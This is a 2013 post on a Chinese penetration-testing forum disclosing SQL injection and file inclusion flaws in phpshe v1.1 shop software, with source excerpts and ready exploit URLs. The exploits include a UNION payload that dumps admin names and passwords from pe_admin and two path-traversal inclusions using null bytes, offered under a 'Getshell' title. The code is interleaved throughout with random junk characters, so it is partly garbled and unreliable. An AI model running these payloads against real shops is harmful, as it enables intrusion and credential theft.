找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2379|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
  w$ m, x$ r3 u! D/* Phpshe v1.1 Vulnerability, T! A9 R8 M6 f& `; o
/* ========================& o/ I1 ^) u9 `2 B- x
/* By: : Kn1f3) l2 _. g. z" Y( q. t0 g
/* E-Mail : 681796@qq.com1 f" P, A' z4 W$ F- H4 g7 d
/*******************************************************/  @5 W  t0 [3 [3 T6 l- @
0×00 整体大概参数传输4 s4 c2 W4 }- |. f' @

" E  V" a- `6 ~) _4 Q8 {
3 u: |. q: C  j6 P( a" z
; e! X# X' R) M1 e$ ^+ [//common.php* @" {; a/ t, ]2 V! r! F
if (get_magic_quotes_gpc()) {! F. ^8 ]5 v$ `
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');8 V1 Y/ u9 Y0 q& }1 v  c
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
: @8 }% g/ e7 O}* p- f7 H% N6 f
else {( k( L: R8 e, F' g
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
9 f/ s  {8 l# [!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
4 d% L! g% R5 j1 M/ D}
: U& n+ S3 b- m, ysession_start();( @6 F/ a) }; d9 Z9 r- {3 B3 P
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
9 z2 @  Z" g4 _, `!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
' n+ \  m# q7 h- \
- {$ K# l" l" F" H5 F4 X  ~0×01 包含漏洞) c( t2 z& N' n( |) E! B/ O6 n

. t1 O" W% n6 K( C- Y
. }$ c' ?6 }3 I! r//首页文件
3 V' g& E* `' r( l. ~<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);( v: }# W6 S! B5 P
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞) R' w6 v+ c, J- }3 ]
pe_result();2 U) o& v) J* A2 @5 M& x3 J
?>( g+ D$ z5 [+ H( u9 a
//common 文件 第15行开始
! i4 ?% A  `0 _4 g9 rurl路由配置9 Z6 p8 x2 s. ]0 _. H& u
$module = $mod = $act = 'index';
; @' j* ?0 {9 T0 n2 }, Z  R6 J$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);, R) S" I1 g! O0 D* ~5 n, @* z/ ~
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);) q: V" d) \& ~7 {2 g
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);; U% }2 [# c* O+ f. a
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%007 D/ ^- D% y5 _/ Z1 e4 a% H6 `


% i/ `0 m5 W7 H) ?' Y6 a7 _. R
  `, G0 N( P3 n) v6 _ 0×02 搜索注入
* a& C- \9 n9 _8 Q. N1 e7 i  ]2 g
$ }  j& c' \+ k% D9 _% ?/ l<code id="code2">

//product.php文件; a4 q! C* t# R$ N
case 'list':
* g% x. K- |9 X$category_id = intval($id);
! k' H" c2 m( r/ Z, ?$ w$info = $db->pe_select('category', array('category_id'=>$category_id));
& ?( r* {5 B% o4 Q//搜索
* m# u1 U% `$ @0 s, ?$sqlwhere = " and `product_state` = 1";3 R; u  ?# Y0 b; Q
pe_lead('hook/category.hook.php');/ h7 @( U* I6 K8 O0 _( Z
if ($category_id) {
* D8 C5 T: P" k9 j8 iwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
* p) m, ^3 u6 y, ~7 U" I8 Q1 N  @2 ]}5 d* }# p8 S7 k- l' h1 M
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤' s2 o% b1 ^' n/ b0 g
if ($_g_orderby) {+ r7 g+ v2 y+ Y% R' h7 S8 g+ e
$orderby = explode('_', $_g_orderby);# R5 Q" w3 J3 y3 S+ O3 e+ j* s
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
! B" d% x9 F4 x4 i, ]}! I; G+ e3 o" x  e& Y- Z
else {# v# M0 R9 o( K! t# @+ Z: `* l
$sqlwhere .= " order by `product_id` desc";
3 i. h  [0 q* g7 R5 R* g' i}( v: g5 c# W0 D& m7 K" u% i
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
2 g9 E7 l! x! l, V//热卖排行! M6 V7 M7 p. [2 `
$product_hotlist = product_hotlist();0 _9 V  c; M7 c9 |( V6 k
//当前路径
# b" y( b4 F9 m) }4 X$nowpath = category_path($category_id);
4 F2 z6 D1 ?# e$seo = pe_seo($info['category_name']);
" O1 T- [. e$ ]4 j" y" C1 Winclude(pe_tpl('product_list.html'));
+ p1 I2 ^% U( d//跟进selectall函数库% B7 z- r+ M8 S
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
, Z+ Q, E3 j% q. H5 b" {4 J0 y{
- O" ~/ Q& d  s! U+ p//处理条件语句
: N# D  k  W- n. {" U9 p2 y9 a$sqlwhere = $this->_dowhere($where);, o2 A+ I# Z# p% w$ j" @6 E
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);2 h7 [9 \; _% p% t$ a4 A) _; E" a
}
/ I) l! y1 o+ [( v7 u//exp3 [$ g' i0 H" }0 J/ p; K
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1( O: r: Y5 z5 j! x

</code>
& _2 p# G; }0 _8 ]! p; J
) q6 P' S" f! c! [9 k- n) q3 C4 @0×03 包含漏洞2# b0 K2 Y) F' B2 Q. S( [) F8 q6 G

$ A3 N8 w. u' _+ t- o4 K- t<code id="code3">

//order.php

case 'pay':

8 [4 ^* t$ g5 v. ~5 l& M9 `
$order_id = pe_dbhold($_g_id);

# x: R( c5 T2 y9 U
$cache_payway = cache::get('payway');


% Q3 Y1 p# L: X: [8 dforeach($cache_payway as $k => $v) {

. i2 t3 h0 E; x% @- F* K
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


2 M5 O8 D+ Z' C. a1 }2 Y1 uif ($k == 'bank') {

9 z" p- Y% P( n  O- ~7 }' s
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

+ a) F! O8 d3 y: Z
}

. Z  Z9 }% k) ?! q
}

, P- i0 N1 Y. ^5 U$ ~
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

4 O6 \$ @5 \/ i! s* X" S$ @& `
!$order['order_id'] && pe_error('订单号错误...');

* M% j" @( i1 T6 O* v% K
if (isset($_p_pesubmit)) {


) z) h! `) i- Sif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


0 K+ {# L( F* X$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

3 J) [6 s8 S5 [) v3 X7 L7 @, s3 v
foreach ($info_list as $v) {

3 g$ s  v- ?3 y- v# v& F5 c
$order['order_name'] .= "{$v['product_name']};";6 C! y& L) V6 I1 E5 t+ T+ u


% x# t; ?: _# v, F( N0 R}

; Y3 m# f. P7 M+ f* _; v
echo '正在为您连接支付网站,请稍后...';


& J3 b+ d9 C/ K0 Rinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

1 Z2 G: x9 R! T5 p) k# t0 U
}//当一切准备好的时候就可以进行"鸡肋包含了"


* ?7 X& ^: {. m7 n, U8 c8 Melse {

% p5 B5 u4 E  d8 ^  E* z( }
pe_error('支付错误...');

0 }' o- `- Q$ X  C" h1 w
}


, t6 N1 q6 P( f$ ~6 l}


# ]; Z# y1 i1 f7 ]) p$ X$seo = pe_seo('选择支付方式');


% ^+ g4 F* {! `$ T- H! v5 m6 winclude(pe_tpl('order_pay.html'));

, M+ ^- U1 w  c0 s
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>: x0 U6 H- W" g! T6 w8 {4 _

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表